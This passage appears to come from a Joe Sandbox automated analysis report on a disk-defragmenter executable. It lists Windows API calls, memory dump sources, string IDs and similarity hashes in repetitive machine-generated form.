                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130A,00000000,?), ref: 0042C8C7
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0042C8D2
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClientMessageRectSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 166717107-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b63bd0a3e2817953073069a49dd37508e5c619b6a8f1caab7bdc8737ebf16daf
                                                                                                                                                                                                                                                                                                • Instruction ID: 1ae2c4f83a303b8bce0181d8b555b548ed397ea70dfa58a9d15d9eacc3878f9d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b63bd0a3e2817953073069a49dd37508e5c619b6a8f1caab7bdc8737ebf16daf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC511AB1204301AFD714DE28CD85FABB7EAFBC4704F008A1DF99953694DBB0AD49CA65
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 0041056D
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041058D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA90: GetDC.USER32(?), ref: 0041AADC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA90: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041AAF4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA90: GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041AB1C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA90: ReleaseDC.USER32(?,?), ref: 0041AB37
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,00000000), ref: 004105E2
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041063B
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Window$Rect$ExtentMessagePoint32ReleaseSendText
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2970461787-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00419AE0: GetModuleHandleW.KERNEL32(ntdll,NtQuerySystemInformation), ref: 00419B01
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00419AE0: GetProcAddress.KERNEL32(00000000), ref: 00419B08
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 004248FF
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleModuleProcSleep
                                                                                                                                                                                                                                                                                                • String ID: CPUUsageExceed$DiskDefrag\AutoDefragmention$d
                                                                                                                                                                                                                                                                                                • API String ID: 451317006-1228882529
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,00090073,?,00000008,00000000,00000800,?,00000000), ref: 00463572
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00463581
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,00090073,?,00000008,00000000,?,?,00000000), ref: 004635C1
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004635C7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ControlDeviceErrorLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2645620995-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005FDEAD
                                                                                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005FDEC6
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Value___vcrt_
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1426506684-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,?), ref: 0046D047
                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 0046D059
                                                                                                                                                                                                                                                                                                • SetCursor.USER32(?,?,?,?,0046CB00,?,00000000,?,?), ref: 0046D06F
                                                                                                                                                                                                                                                                                                • DestroyCursor.USER32(00000000), ref: 0046D07A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Cursor$Load$Destroy
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2883253431-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00000000), ref: 004676B7
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000403,00000003,000001F4), ref: 004676CC
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000403,00000002,00001770), ref: 004676E1
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,00000190), ref: 004676F6
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __aulldiv
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 3732870572-2762138152
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045D3BE
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045D3D1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 885266447-2762138152
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __aulldiv
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 3732870572-2762138152
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                • SHQueryRecycleBinW.SHELL32(?,?), ref: 0042B1A8
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalEnterQueryRecycleSection
                                                                                                                                                                                                                                                                                                • String ID: C:\$`=
                                                                                                                                                                                                                                                                                                • API String ID: 1132591718-3292444104
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 00456370
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,?), ref: 004563C5
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                • String ID: P
                                                                                                                                                                                                                                                                                                • API String ID: 2050909247-3110715001
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoInitialize.OLE32(00000000,BB40E64E,00094658,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                                • GetLogicalDrives.KERNEL32 ref: 00427273
                                                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 004272D7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateCriticalDriveDrivesEnterInitializeInstanceLogicalSectionTypeUninitialize
                                                                                                                                                                                                                                                                                                • String ID: C:\
                                                                                                                                                                                                                                                                                                • API String ID: 2354564324-3404278061
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041D750: #2.OLEAUT32(80000001,DiskDefrag\Setting Option\Exclude,?,?,?,?,00427EC2,BB40E64E), ref: 0041D7DA
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041D750: #9.OLEAUT32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D807
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042F1C6
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F$`=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                                • Opcode ID: 76ea21c8fa45cc5a0c53382b0db775d5b5275d38abb4e4b5e38ac425cd2fe3fe
                                                                                                                                                                                                                                                                                                • Instruction ID: 5b7d0dfdc37c6029d1809ee2af6bf9b154064672585324479e47d4ede9078e07
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76ea21c8fa45cc5a0c53382b0db775d5b5275d38abb4e4b5e38ac425cd2fe3fe
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9541A672B04310DBD310EF54E981B6BB7F4EB88714F91097EF945A7240D735AC488BAA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0042D31C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F$`=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                                • Opcode ID: 4693b1930bf57ce9ef75d7503c8f5d038f37f734dc7154d68938e473202b5238
                                                                                                                                                                                                                                                                                                • Instruction ID: 93b085b09f2c4ac2bdbc263637bfa3f203d19d869e2dbc8046dfdb1fcf76ffa8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4693b1930bf57ce9ef75d7503c8f5d038f37f734dc7154d68938e473202b5238
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44311F35A00615CFC320DBB4E9C5A6BB7E0EB45311F5489AAE86ED2351DA34E8848B69
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001015,?,?), ref: 004230DC
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F$`=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                                • Opcode ID: fc5b2b4a0769cef6be2e786a124323a306287658ccb6bf050eb8b0b8ec3bf991
                                                                                                                                                                                                                                                                                                • Instruction ID: 16e62712f1819d0f9283694aa4ee6730415ba22870223c05465c6e43f049811c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc5b2b4a0769cef6be2e786a124323a306287658ccb6bf050eb8b0b8ec3bf991
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20214D75300A13AFC61CEB39D8998F9F3AAFF88305784422DE91A87251CB247D51CBD4
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,?), ref: 00410404
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F$Button_Check
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-1310182199
                                                                                                                                                                                                                                                                                                • Opcode ID: a42f14eec4e704c4dcdb54057e86be65e34abce19af7510991bb57dc56cb9c1c
                                                                                                                                                                                                                                                                                                • Instruction ID: 09b5b65d6a19d25cf5f991273958dae6b0a4a0afcd6ef2ce1ca3dc747381d305
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a42f14eec4e704c4dcdb54057e86be65e34abce19af7510991bb57dc56cb9c1c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3114F75200248AFCB30EF2ADC85AC933A4AB54314F11443FAD0DAB392DE79A9458B58
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042F1C6
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F$`=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D4B8
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D4DD
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-180763933
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(?,00090064,00000000,00000000,?), ref: 00460093
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004600C0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ControlDeviceUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID: JD
                                                                                                                                                                                                                                                                                                • API String ID: 9847766-1871045537
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ControlDeviceErrorLast
                                                                                                                                                                                                                                                                                                • String ID: JD
                                                                                                                                                                                                                                                                                                • API String ID: 2645620995-1871045537
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RegOpenKeyW.ADVAPI32(?,SYSTEM\CurrentControlSet\services\BootDefrag), ref: 0041A7F7
                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32 ref: 0041A811
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A820: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A883
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A820: PathFileExistsW.SHLWAPI(?,?,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A8F4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A820: #165.SHELL32(00000000,?,?,?,?,00093E00,00000000,00476569,000000FF,0041A806), ref: 0041A904
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • SYSTEM\CurrentControlSet\services\BootDefrag, xrefs: 0041A7E5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmp
